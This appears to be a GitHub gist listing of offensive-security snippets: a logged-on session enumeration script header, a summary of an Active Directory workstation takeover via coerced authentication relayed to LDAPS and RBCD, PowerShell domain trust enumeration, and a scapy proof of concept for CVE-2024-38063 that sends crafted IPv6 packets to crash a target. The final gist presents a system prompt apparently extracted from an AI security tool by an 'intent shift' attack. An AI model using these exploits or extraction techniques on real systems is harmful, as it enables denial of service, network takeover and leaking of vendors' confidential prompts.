WaterBucket ThanniKudam
Time Travelling..
ThanniKudam / Get-LoggedOn.py
Created August 11, 2024 18:20 — forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired by itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
ThanniKudam / Workstation-Takeover.md
Created August 11, 2024 18:20 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11), and possibly servers (if Desktop Experience is installed), when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from time import sleep
import sys
conf.verb = 0
SPORT = RandNum(1024, 65535)
my_seq = 1000

#Microsoft Windows: CVE-2024-38063: Windows TCP/IP Remote Code Execution Vulnerability
#Couldn't find a way to escalate it to RCE (Skill Issues). This PoC will trigger BSoD :)
from scapy.all import *
IPAddr = '' # Target's IPV6 Address
MACAddr = '' # Target's MAC Address
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()

ThanniKudam / interact.py
Last active October 26, 2025 07:54
dreadnode interact cli
"""If you are doing dreadnode challenges, this code will help you to interact with the server easily via cli."""
#!/usr/bin/env python3
"""
Enhanced dreadnode_cli.py
Beautiful terminal interface for Dreadnode CTF challenge interaction and flag submission.
"""
import os
import sys
ThanniKudam / hacktron-systemprompt.md
Created November 22, 2025 03:42
Hacktron.AI system prompt - Technique used: Intent Shift Attacks - Reference: https://arxiv.org/html/2505.17519v2

<complete_system_prompt>
You are hacktron, a powerful security research assistant.

## Mission